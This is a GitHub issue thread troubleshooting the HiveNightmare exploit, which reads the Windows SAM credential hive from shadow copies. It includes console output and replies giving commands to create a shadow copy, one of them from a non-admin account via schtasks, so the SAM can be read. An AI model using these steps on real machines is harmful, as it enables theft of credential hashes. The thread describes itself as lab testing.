Getting error "Could not open SAM" on Windows 10.0.19043.1055

Question

Getting error "Could not open SAM" on Windows 10.0.19043.1055

Closed this issue 3 years ago · 3 comments

To start, I know this 'exploit' (for lack of a better term) is very new and still being explored. I'm not expecting anyone to solve my issues, but wanted to get information out there in case others are running into the same issue and if any of us (myself included) can solve it, it may help others.

When running this I'm getting an error that it could not open the SAM:

C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>.\HiveNightmare.exe
Could not open SAM :( Is System Protection not enabled or vulnerability fixed?  Note currently hardcoded to look for first 4 VSS snapshots only - list snapshots with vssadmin list shadows
C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>

Currently running Windows [Version 10.0.19043.1055] and can see that the user permissions read for the SAM database. This is a domain joined computer in my lab with no other changes made. The image is the latest VM for developers.

C:\Windows\system32>icacls c:\Windows\system32\config\SAM
c:\Windows\system32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:\Windows\system32>

I did try the command suggested in the error and it looks like it can't find any shadow copies.

C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

No items found that satisfy the query.

C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>

On my non-domain joined hosts it does not show that the users can read the SAM database, so I'm not sure if this requires domain joining or if it's just me.

If I find a solution, I'll update this. If anyone else has any thoughts/ideas I would welcome them.

Answer 1 · 2021-07-20T14:13:18.000Z

I was able to resolve this by manually kicking off a shadowcopy as the admin user (for proof of concept purposes) using this command:

wmic shadowcopy call create Volume=c:\

I saw only afterwards that you can trigger that from a non-admin user using:

schtasks.exe /run /TN "\Microsoft\Windows\FileHistory\File History (maintenance mode)"

I believe this won't be an issue in most scenarios as there seems to be a shadow copy on most machines. I have not verified it, but I believe it may depend on your disk size and since my VM is rather small, it probably didn't trigger it.

Answer 2 · 2021-07-20T14:21:59.000Z

Cheers! Yeah, for example on my gaming PC there was a snapshot from monthly patching, and one from installing 7-zip. So in real world you should have some snapshots from usage.

Answer 3 · 2021-07-20T14:22:27.000Z

Btw I updated the code to look for first 4 snapshots instead, so an early snapshot should work now.